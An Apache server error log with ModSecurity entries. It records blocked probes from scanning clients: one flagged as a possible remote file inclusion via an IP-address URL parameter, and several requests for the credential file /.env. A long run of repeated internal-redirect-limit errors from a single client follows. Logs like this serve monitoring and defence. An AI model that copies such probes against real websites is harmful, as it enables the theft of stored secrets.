[Mon May 11 17:17:35.533191 2026] [security2:error] [pid 1411055:tid 1411071] [client 85.208.96.193:30394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHzD0WKUxpmnkK7zHyQCgAAAQ4"]
[Mon May 11 17:17:35.533423 2026] [security2:error] [pid 1411055:tid 1411071] [client 85.208.96.193:30394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHzD0WKUxpmnkK7zHyQCgAAAQ4"]
[Mon May 11 17:18:08.330458 2026] [security2:error] [pid 1411201:tid 1411248] [client 85.11.167.19:50260] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHzMPy_GXSWIKeli0sFHgAAAII"]
[Mon May 11 17:18:08.330677 2026] [security2:error] [pid 1411201:tid 1411248] [client 85.11.167.19:50260] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHzMPy_GXSWIKeli0sFHgAAAII"]
[Mon May 11 17:18:08.330936 2026] [security2:error] [pid 1411201:tid 1411248] [client 85.11.167.19:50260] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHzMPy_GXSWIKeli0sFHgAAAII"]
[Mon May 11 17:18:16.977933 2026] [core:error] [pid 1411201:tid 1411266] [client 172.190.142.176:48166] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:16.977975 2026] [core:error] [pid 1411201:tid 1411266] [client 172.190.142.176:48166] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.168597 2026] [core:error] [pid 1411055:tid 1411067] [client 172.190.142.176:45176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.168632 2026] [core:error] [pid 1411055:tid 1411067] [client 172.190.142.176:45176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.357106 2026] [core:error] [pid 1412074:tid 1412087] [client 172.190.142.176:29776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.357131 2026] [core:error] [pid 1412074:tid 1412087] [client 172.190.142.176:29776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.554189 2026] [core:error] [pid 1411099:tid 1411120] [client 172.190.142.176:50784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.554220 2026] [core:error] [pid 1411099:tid 1411120] [client 172.190.142.176:50784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.738204 2026] [core:error] [pid 1411055:tid 1411079] [client 172.190.142.176:34208] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.738245 2026] [core:error] [pid 1411055:tid 1411079] [client 172.190.142.176:34208] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.928108 2026] [core:error] [pid 1412074:tid 1412100] [client 172.190.142.176:34203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:17.928138 2026] [core:error] [pid 1412074:tid 1412100] [client 172.190.142.176:34203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.117475 2026] [core:error] [pid 1411099:tid 1411111] [client 172.190.142.176:29772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.117510 2026] [core:error] [pid 1411099:tid 1411111] [client 172.190.142.176:29772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.319597 2026] [core:error] [pid 1424905:tid 1424908] [client 172.190.142.176:34198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.319633 2026] [core:error] [pid 1424905:tid 1424908] [client 172.190.142.176:34198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.500737 2026] [core:error] [pid 1411055:tid 1411064] [client 172.190.142.176:34221] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.500773 2026] [core:error] [pid 1411055:tid 1411064] [client 172.190.142.176:34221] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.699006 2026] [core:error] [pid 1416109:tid 1416135] [client 172.190.142.176:8304] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.699040 2026] [core:error] [pid 1416109:tid 1416135] [client 172.190.142.176:8304] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.883505 2026] [core:error] [pid 1411099:tid 1411104] [client 172.190.142.176:43706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:18.883534 2026] [core:error] [pid 1411099:tid 1411104] [client 172.190.142.176:43706] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.065923 2026] [core:error] [pid 1424905:tid 1424912] [client 172.190.142.176:53226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.065958 2026] [core:error] [pid 1424905:tid 1424912] [client 172.190.142.176:53226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.260476 2026] [core:error] [pid 1411055:tid 1411057] [client 172.190.142.176:43709] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.260510 2026] [core:error] [pid 1411055:tid 1411057] [client 172.190.142.176:43709] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.448570 2026] [core:error] [pid 1412074:tid 1412092] [client 172.190.142.176:29324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.448602 2026] [core:error] [pid 1412074:tid 1412092] [client 172.190.142.176:29324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.628483 2026] [core:error] [pid 1411099:tid 1411123] [client 172.190.142.176:48137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.628515 2026] [core:error] [pid 1411099:tid 1411123] [client 172.190.142.176:48137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.819588 2026] [core:error] [pid 1411055:tid 1411081] [client 172.190.142.176:25368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:19.819621 2026] [core:error] [pid 1411055:tid 1411081] [client 172.190.142.176:25368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.013559 2026] [core:error] [pid 1416109:tid 1416140] [client 172.190.142.176:28926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.013594 2026] [core:error] [pid 1416109:tid 1416140] [client 172.190.142.176:28926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.267108 2026] [core:error] [pid 1411201:tid 1411265] [client 172.190.142.176:25357] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.267150 2026] [core:error] [pid 1411201:tid 1411265] [client 172.190.142.176:25357] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.462835 2026] [core:error] [pid 1424905:tid 1424927] [client 172.190.142.176:25381] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.462874 2026] [core:error] [pid 1424905:tid 1424927] [client 172.190.142.176:25381] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.648427 2026] [core:error] [pid 1412074:tid 1412097] [client 172.190.142.176:42182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.648457 2026] [core:error] [pid 1412074:tid 1412097] [client 172.190.142.176:42182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.832031 2026] [core:error] [pid 1411099:tid 1411113] [client 172.190.142.176:34223] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:20.832063 2026] [core:error] [pid 1411099:tid 1411113] [client 172.190.142.176:34223] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.063884 2026] [core:error] [pid 1411201:tid 1411257] [client 172.190.142.176:25377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.063920 2026] [core:error] [pid 1411201:tid 1411257] [client 172.190.142.176:25377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.256838 2026] [core:error] [pid 1411055:tid 1411072] [client 172.190.142.176:48159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.256863 2026] [core:error] [pid 1411055:tid 1411072] [client 172.190.142.176:48159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.447472 2026] [core:error] [pid 1412074:tid 1412093] [client 172.190.142.176:48167] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.447504 2026] [core:error] [pid 1412074:tid 1412093] [client 172.190.142.176:48167] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.631605 2026] [core:error] [pid 1411099:tid 1411101] [client 172.190.142.176:34184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.631634 2026] [core:error] [pid 1411099:tid 1411101] [client 172.190.142.176:34184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.821790 2026] [core:error] [pid 1424905:tid 1424917] [client 172.190.142.176:41640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:21.821819 2026] [core:error] [pid 1424905:tid 1424917] [client 172.190.142.176:41640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.013585 2026] [core:error] [pid 1411055:tid 1411080] [client 172.190.142.176:43561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.013620 2026] [core:error] [pid 1411055:tid 1411080] [client 172.190.142.176:43561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.191591 2026] [core:error] [pid 1416109:tid 1416149] [client 172.190.142.176:43707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.191626 2026] [core:error] [pid 1416109:tid 1416149] [client 172.190.142.176:43707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.382497 2026] [core:error] [pid 1411201:tid 1411251] [client 172.190.142.176:8310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.382533 2026] [core:error] [pid 1411201:tid 1411251] [client 172.190.142.176:8310] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.569833 2026] [core:error] [pid 1424905:tid 1424929] [client 172.190.142.176:43552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.569866 2026] [core:error] [pid 1424905:tid 1424929] [client 172.190.142.176:43552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.800125 2026] [core:error] [pid 1424905:tid 1424919] [client 172.190.142.176:8278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.800195 2026] [core:error] [pid 1424905:tid 1424919] [client 172.190.142.176:8278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.998355 2026] [core:error] [pid 1411201:tid 1411268] [client 172.190.142.176:8276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:22.998391 2026] [core:error] [pid 1411201:tid 1411268] [client 172.190.142.176:8276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.199051 2026] [core:error] [pid 1412074:tid 1412090] [client 172.190.142.176:34193] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.199079 2026] [core:error] [pid 1412074:tid 1412090] [client 172.190.142.176:34193] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.404085 2026] [core:error] [pid 1411099:tid 1411116] [client 172.190.142.176:53195] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.404112 2026] [core:error] [pid 1411099:tid 1411116] [client 172.190.142.176:53195] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.606409 2026] [core:error] [pid 1411201:tid 1411253] [client 172.190.142.176:53222] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.606445 2026] [core:error] [pid 1411201:tid 1411253] [client 172.190.142.176:53222] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.812457 2026] [core:error] [pid 1424905:tid 1424916] [client 172.190.142.176:8304] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:23.812485 2026] [core:error] [pid 1424905:tid 1424916] [client 172.190.142.176:8304] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.005584 2026] [core:error] [pid 1411201:tid 1411252] [client 172.190.142.176:43582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.005614 2026] [core:error] [pid 1411201:tid 1411252] [client 172.190.142.176:43582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.191049 2026] [core:error] [pid 1412074:tid 1412083] [client 172.190.142.176:43536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.191087 2026] [core:error] [pid 1412074:tid 1412083] [client 172.190.142.176:43536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.390309 2026] [core:error] [pid 1416109:tid 1416129] [client 172.190.142.176:53199] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.390355 2026] [core:error] [pid 1416109:tid 1416129] [client 172.190.142.176:53199] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.623323 2026] [core:error] [pid 1411099:tid 1411102] [client 172.190.142.176:34199] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.623358 2026] [core:error] [pid 1411099:tid 1411102] [client 172.190.142.176:34199] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.810121 2026] [core:error] [pid 1424905:tid 1424932] [client 172.190.142.176:34234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:24.810151 2026] [core:error] [pid 1424905:tid 1424932] [client 172.190.142.176:34234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.009413 2026] [core:error] [pid 1411055:tid 1411065] [client 172.190.142.176:29765] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.009445 2026] [core:error] [pid 1411055:tid 1411065] [client 172.190.142.176:29765] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.197851 2026] [core:error] [pid 1411201:tid 1411259] [client 172.190.142.176:8305] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.197880 2026] [core:error] [pid 1411201:tid 1411259] [client 172.190.142.176:8305] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.384633 2026] [core:error] [pid 1411055:tid 1411075] [client 172.190.142.176:48157] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.384664 2026] [core:error] [pid 1411055:tid 1411075] [client 172.190.142.176:48157] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.586965 2026] [core:error] [pid 1411099:tid 1411105] [client 172.190.142.176:25342] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.586991 2026] [core:error] [pid 1411099:tid 1411105] [client 172.190.142.176:25342] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.793060 2026] [core:error] [pid 1424905:tid 1424913] [client 172.190.142.176:28927] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.793094 2026] [core:error] [pid 1424905:tid 1424913] [client 172.190.142.176:28927] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.987080 2026] [core:error] [pid 1411055:tid 1411078] [client 172.190.142.176:50788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:25.987107 2026] [core:error] [pid 1411055:tid 1411078] [client 172.190.142.176:50788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.183532 2026] [core:error] [pid 1416109:tid 1416146] [client 172.190.142.176:25348] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.183563 2026] [core:error] [pid 1416109:tid 1416146] [client 172.190.142.176:25348] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.381945 2026] [core:error] [pid 1411201:tid 1411264] [client 172.190.142.176:34188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.381984 2026] [core:error] [pid 1411201:tid 1411264] [client 172.190.142.176:34188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.562504 2026] [core:error] [pid 1411055:tid 1411061] [client 172.190.142.176:41663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
